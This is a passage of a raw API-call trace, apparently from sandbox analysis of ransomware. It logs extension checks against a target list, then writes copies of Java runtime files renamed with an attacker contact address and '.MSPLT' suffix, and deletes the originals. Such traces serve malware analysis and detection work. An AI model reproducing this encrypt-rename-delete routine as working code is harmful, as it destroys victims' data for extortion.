returned 4 [0299.445] lstrcmpiW (lpString1=".bz2", lpString2="Z.pf") returned -1 [0299.445] lstrlenW (lpString=".7z") returned 3 [0299.445] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0299.445] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0299.445] lstrlenW (lpString=".dbf") returned 4 [0299.445] lstrcmpiW (lpString1=".dbf", lpString2="Z.pf") returned -1 [0299.445] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0299.445] lstrlenW (lpString=".1cd") returned 4 [0299.445] lstrcmpiW (lpString1=".1cd", lpString2="Z.pf") returned -1 [0299.445] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0299.445] lstrlenW (lpString=".jpg") returned 4 [0299.445] lstrcmpiW (lpString1=".jpg", lpString2="Z.pf") returned -1 [0299.445] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0299.445] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0299.446] lstrlenW (lpString=".doc") returned 4 [0299.446] lstrcmpiW (lpString1=".doc", lpString2="Z.pf") returned -1 [0299.446] lstrlenW (lpString=".docx") returned 5 [0299.446] lstrcmpiW (lpString1=".docx", lpString2="YZ.pf") returned -1 [0299.446] lstrlenW (lpString=".pdf") returned 4 [0299.446] lstrcmpiW (lpString1=".pdf", lpString2="Z.pf") returned -1 [0299.446] lstrlenW (lpString=".xls") returned 4 [0299.446] lstrcmpiW (lpString1=".xls", lpString2="Z.pf") returned -1 [0299.446] lstrlenW (lpString=".xlsx") returned 5 [0299.446] lstrcmpiW (lpString1=".xlsx", lpString2="YZ.pf") returned -1 [0299.446] lstrlenW (lpString=".ppt") returned 4 [0299.446] lstrcmpiW (lpString1=".ppt", lpString2="Z.pf") returned -1 [0299.446] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0299.446] lstrlenW (lpString=".zip") returned 4 [0299.446] lstrcmpiW (lpString1=".zip", lpString2="Z.pf") returned -1 [0299.446] lstrlenW (lpString=".rar") returned 4 [0299.446] lstrcmpiW (lpString1=".rar", lpString2="Z.pf") returned -1 [0299.446] lstrlenW (lpString=".bz2") returned 4 [0299.446] lstrcmpiW (lpString1=".bz2", lpString2="Z.pf") returned -1 [0299.446] lstrlenW (lpString=".7z") returned 3 [0299.446] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0299.446] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0299.446] lstrlenW (lpString=".dbf") returned 4 [0299.446] lstrcmpiW (lpString1=".dbf", lpString2="Z.pf") returned -1 [0299.446] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0299.446] lstrlenW (lpString=".1cd") returned 4 [0299.446] lstrcmpiW (lpString1=".1cd", lpString2="Z.pf") returned -1 [0299.446] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 52 [0299.446] lstrlenW (lpString=".jpg") returned 4 [0299.446] lstrcmpiW (lpString1=".jpg", lpString2="Z.pf") returned -1 [0299.446] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0299.447] lstrlenW (lpString="messages_fr.properties") returned 22 [0299.447] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0299.455] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=3409) returned 1 [0299.455] CloseHandle (hObject=0x4c0) returned 1 [0299.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties")) returned 0x20 [0299.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.455] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0299.456] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.456] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.456] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0299.456] GetLastError () returned 0x0 [0299.456] ReadFile (in: hFile=0x4c0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0xd51, lpOverlapped=0x0) returned 1 [0299.459] WriteFile (in: hFile=0x378, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xd60, lpOverlapped=0x0) returned 1 [0299.460] ReadFile (in: hFile=0x4c0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0299.460] WriteFile (in: hFile=0x378, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x100, lpOverlapped=0x0) returned 1 [0299.460] SetEndOfFile (hFile=0x378) returned 1 [0299.460] CloseHandle (hObject=0x378) returned 1 [0299.461] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.461] SetEndOfFile (hFile=0x4c0) returned 1 [0299.464] CloseHandle (hObject=0x4c0) returned 1 [0299.465] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0299.465] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties")) returned 1 [0299.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties") returned 68 [0299.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties") returned 68 [0299.466] lstrlenW (lpString=".doc") returned 4 [0299.466] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0299.466] lstrlenW (lpString=".docx") returned 5 [0299.466] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0299.466] lstrlenW (lpString=".pdf") returned 4 [0299.466] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0299.466] lstrlenW (lpString=".xls") returned 4 [0299.466] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0299.466] lstrlenW (lpString=".xlsx") returned 5 [0299.466] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0299.466] lstrlenW (lpString=".ppt") returned 4 [0299.466] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0299.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties") returned 68 [0299.466] lstrlenW (lpString=".zip") returned 4 [0299.466] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0299.466] lstrlenW (lpString=".rar") returned 4 [0299.466] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0299.466] lstrlenW (lpString=".bz2") returned 4 [0299.466] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0299.466] lstrlenW (lpString=".7z") returned 3 [0299.466] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0299.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties") returned 68 [0299.466] lstrlenW (lpString=".dbf") returned 4 [0299.466] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0299.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties") returned 68 [0299.466] lstrlenW (lpString=".1cd") returned 4 [0299.467] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0299.467] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties") returned 68 [0299.467] lstrlenW (lpString=".jpg") returned 4 [0299.467] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0299.467] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties") returned 68 [0299.467] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties") returned 68 [0299.467] lstrlenW (lpString=".doc") returned 4 [0299.467] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0299.467] lstrlenW (lpString=".docx") returned 5 [0299.467] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0299.467] lstrlenW (lpString=".pdf") returned 4 [0299.467] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0299.467] lstrlenW (lpString=".xls") returned 4 [0299.467] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0299.467] lstrlenW (lpString=".xlsx") returned 5 [0299.467] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0299.467] lstrlenW (lpString=".ppt") returned 4 [0299.467] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0299.467] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties") returned 68 [0299.467] lstrlenW (lpString=".zip") returned 4 [0299.467] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0299.467] lstrlenW (lpString=".rar") returned 4 [0299.467] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0299.467] lstrlenW (lpString=".bz2") returned 4 [0299.467] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0299.467] lstrlenW (lpString=".7z") returned 3 [0299.467] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0299.467] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties") returned 68 [0299.467] lstrlenW (lpString=".dbf") returned 4 [0299.467] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0299.468] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties") returned 68 [0299.468] lstrlenW (lpString=".1cd") returned 4 [0299.468] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0299.468] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties") returned 68 [0299.468] lstrlenW (lpString=".jpg") returned 4 [0299.468] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0299.468] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0299.468] lstrlenW (lpString="messages_it.properties") returned 22 [0299.468] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0299.468] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=3223) returned 1 [0299.468] CloseHandle (hObject=0x4c0) returned 1 [0299.469] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties")) returned 0x20 [0299.469] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.469] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0299.469] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.469] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.469] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0299.470] GetLastError () returned 0x0 [0299.470] ReadFile (in: hFile=0x4c0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0xc97, lpOverlapped=0x0) returned 1 [0299.842] WriteFile (in: hFile=0x378, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xca0, lpOverlapped=0x0) returned 1 [0299.844] ReadFile (in: hFile=0x4c0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0299.844] WriteFile (in: hFile=0x378, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x100, lpOverlapped=0x0) returned 1 [0299.844] SetEndOfFile (hFile=0x378) returned 1 [0299.844] CloseHandle (hObject=0x378) returned 1 [0299.848] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.849] SetEndOfFile (hFile=0x4c0) returned 1 [0299.852] CloseHandle (hObject=0x4c0) returned 1 [0299.852] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0300.352] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties")) returned 1 [0300.505] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0300.505] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0300.505] lstrlenW (lpString=".doc") returned 4 [0300.505] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0300.505] lstrlenW (lpString=".docx") returned 5 [0300.505] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0300.505] lstrlenW (lpString=".pdf") returned 4 [0300.505] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0300.505] lstrlenW (lpString=".xls") returned 4 [0300.505] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0300.505] lstrlenW (lpString=".xlsx") returned 5 [0300.505] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0300.505] lstrlenW (lpString=".ppt") returned 4 [0300.505] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0300.505] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0300.505] lstrlenW (lpString=".zip") returned 4 [0300.505] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0300.506] lstrlenW (lpString=".rar") returned 4 [0300.506] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0300.506] lstrlenW (lpString=".bz2") returned 4 [0300.506] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0300.506] lstrlenW (lpString=".7z") returned 3 [0300.506] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0300.506] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0300.506] lstrlenW (lpString=".dbf") returned 4 [0300.506] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0300.506] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0300.506] lstrlenW (lpString=".1cd") returned 4 [0300.506] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0300.506] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0300.506] lstrlenW (lpString=".jpg") returned 4 [0300.506] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0300.506] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0300.506] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0300.506] lstrlenW (lpString=".doc") returned 4 [0300.506] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0300.506] lstrlenW (lpString=".docx") returned 5 [0300.506] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0300.506] lstrlenW (lpString=".pdf") returned 4 [0300.506] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0300.506] lstrlenW (lpString=".xls") returned 4 [0300.506] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0300.507] lstrlenW (lpString=".xlsx") returned 5 [0300.507] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0300.507] lstrlenW (lpString=".ppt") returned 4 [0300.507] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0300.507] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0300.507] lstrlenW (lpString=".zip") returned 4 [0300.507] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0300.507] lstrlenW (lpString=".rar") returned 4 [0300.507] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0300.507] lstrlenW (lpString=".bz2") returned 4 [0300.507] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0300.507] lstrlenW (lpString=".7z") returned 3 [0300.507] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0300.507] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0300.507] lstrlenW (lpString=".dbf") returned 4 [0300.507] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0300.507] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0300.507] lstrlenW (lpString=".1cd") returned 4 [0300.507] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0300.507] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 68 [0300.507] lstrlenW (lpString=".jpg") returned 4 [0300.507] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0300.508] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0300.508] lstrlenW (lpString="messages_pt_BR.properties") returned 25 [0300.508] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0300.678] GetFileSizeEx (in: hFile=0x42c, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=3285) returned 1 [0300.678] CloseHandle (hObject=0x42c) returned 1 [0300.678] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties")) returned 0x20 [0300.862] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0301.006] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e4 [0301.508] SetFilePointerEx (in: hFile=0x4e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0301.508] SetFilePointerEx (in: hFile=0x4e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0301.508] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f8 [0303.354] GetLastError () returned 0x0 [0303.354] ReadFile (in: hFile=0x4e4, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0xcd5, lpOverlapped=0x0) returned 1 [0303.357] WriteFile (in: hFile=0x4f8, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xce0, lpOverlapped=0x0) returned 1 [0303.358] ReadFile (in: hFile=0x4e4, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0303.358] WriteFile (in: hFile=0x4f8, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x106, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x106, lpOverlapped=0x0) returned 1 [0303.358] SetEndOfFile (hFile=0x4f8) returned 1 [0303.358] CloseHandle (hObject=0x4f8) returned 1 [0303.360] SetFilePointerEx (in: hFile=0x4e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.360] SetEndOfFile (hFile=0x4e4) returned 1 [0303.363] CloseHandle (hObject=0x4e4) returned 1 [0303.363] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0303.364] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties")) returned 1 [0303.364] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties") returned 71 [0303.364] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties") returned 71 [0303.364] lstrlenW (lpString=".doc") returned 4 [0303.364] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0303.365] lstrlenW (lpString=".docx") returned 5 [0303.365] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0303.365] lstrlenW (lpString=".pdf") returned 4 [0303.365] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0303.365] lstrlenW (lpString=".xls") returned 4 [0303.365] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0303.365] lstrlenW (lpString=".xlsx") returned 5 [0303.365] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0303.365] lstrlenW (lpString=".ppt") returned 4 [0303.365] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0303.365] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties") returned 71 [0303.365] lstrlenW (lpString=".zip") returned 4 [0303.365] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0303.365] lstrlenW (lpString=".rar") returned 4 [0303.365] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0303.365] lstrlenW (lpString=".bz2") returned 4 [0303.365] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0303.365] lstrlenW (lpString=".7z") returned 3 [0303.365] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0303.365] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties") returned 71 [0303.365] lstrlenW (lpString=".dbf") returned 4 [0303.365] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0303.365] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties") returned 71 [0303.365] lstrlenW (lpString=".1cd") returned 4 [0303.365] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0303.365] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties") returned 71 [0303.365] lstrlenW (lpString=".jpg") returned 4 [0303.365] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 